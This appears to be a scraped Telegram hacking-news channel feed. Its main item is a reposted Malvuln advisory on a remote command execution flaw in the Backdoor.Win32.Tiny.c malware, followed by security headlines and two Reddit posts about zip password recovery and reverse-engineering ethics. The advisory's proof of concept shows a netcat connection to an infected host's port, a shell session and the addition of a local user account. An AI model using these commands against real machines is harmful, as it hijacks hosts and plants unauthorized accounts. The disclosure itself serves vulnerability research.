Hacking Articles Tips Tricks Videos Tutorials
471 subscribers
65.9K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.Tiny.c Code Execution

https://3.bp.blogspot.com/-sRAbWielMtM/WWlvVvmDA-I/AAAAAAAAIN8/PunzJUFKKskcHl_zTOrA6xP6ETTvhbejQCLcBGAs/s1600/h46.png
Backdoor.Win32.Tiny.c malware suffers from a code execution vulnerability.

MD5 | aedf45ef2083c64101cc4f3d4de29685

Download
Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/c61733c6bcbbb11cee634e0a3fd672e9.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Tiny.c
Vulnerability: Unauthenticated Remote Command Execution
Description: The malware listens on TCP port 7778. Third-party attackers who can reach an infected system can run any OS commands hijacking the compromised host.
Type: PE32
MD5: c61733c6bcbbb11cee634e0a3fd672e9
Vuln ID: MVID-2022-0476
Disclosure: 01/29/2022
Exploit/PoC:
Note: Hit Enter twice and we get a command line to the infected host.

nc64.exe x.x.x.x 7778

wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
'wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\Victim\Desktop>whoami
whoami
desktop-2c3iqho\victim

C:\Users\Victim\Desktop>net user malvuln 13 /add
net user malvuln 13 /add
The command completed successfully.

C:\Users\Victim\Desktop>
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Source:packetstormsecurity.com
Sent by @TheFeedReaderBot

___________________________
@hacking_Attack
@Hacking_Video
How I approached Dependency Confusion!

Hi People, In this blog, I will be sharing my approach for finding Dependency Confusion bugs.Continue reading on Medium »
Read more...
Dark Reading: Attacks/Breaches
Crypto Agility: Solving for the Inevitable

The advent of viable quantum computers will threaten today’s encryption standards, which are the basis of Internet security. Cryptographic agility is the key to post-quantum computing security, although implementing it will be a formidable challenge.
Dark Reading: Attacks/Breaches
The Zero Trust Timer Is on for Federal Agencies — How Ready Are They?

A new study coincides with OMB’s finalization of its zero-trust strategy through 2024.
Dark Reading: Attacks/Breaches
7 Privacy Tips for Security Pros

How best to integrate privacy into your organization's security program.
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Recover/Bypass Zip File Password

I have a zip file with pictures from many years ago, around 2GB, and I dont remember that password at all. I am sure it has German characters and it is certainly longer than 8 characters. I tried password-online.com recovery, but they didnt yield any result. Also I tried to go through the johntheripper stuff, but I think I dont have enough computing power locally to get anything, and I in general too stupid for this. I am willing to pay for a service. Any help?

EDIT: For clarification. I DO own the files and they are merely old digital pictures of myself.

EDIT 2: I tried this comment "There are a number of them but most of them are geared towards security professionals and only offer options for cracking the hash directly, you would need to manually extract the hash from the ZIP file to enter it in. (e.g. crackstation.net, GPUHASH.me, Hashes.com etc.) This site however seems to offer a more user-friendly approach of simply uploading the ZIP archive."
But my files exceeds 200Mbs, so I cannot use their services.

submitted by /u/Ancestral_Recall
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Why?

I posted on here that I had broken the code to a popular site and my post was taken down. I in no way want to break the terms of this community. However, if I can't share the reverse engineering here. I'm at a bit of a loss. What are the ethics I need to keep in mind?

submitted by /u/jaywdice
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video